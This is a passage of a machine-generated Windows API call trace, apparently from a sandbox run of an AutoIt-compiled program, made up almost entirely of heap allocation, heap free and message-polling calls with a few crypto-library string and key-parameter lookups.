(HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da398 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0029.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0029.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.886] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0029.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0029.886] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0029.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0029.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0029.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0029.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0029.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0029.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0029.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0029.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.887] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0029.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0029.888] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.888] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0029.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.888] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0029.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0029.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0029.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0029.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0029.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0029.891] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0029.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0029.892] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0029.892] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.892] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.892] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.892] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.892] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.892] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.892] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.892] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.892] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0029.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.892] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.892] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.892] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.892] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.892] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.893] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0029.893] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0029.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.893] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0029.893] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, 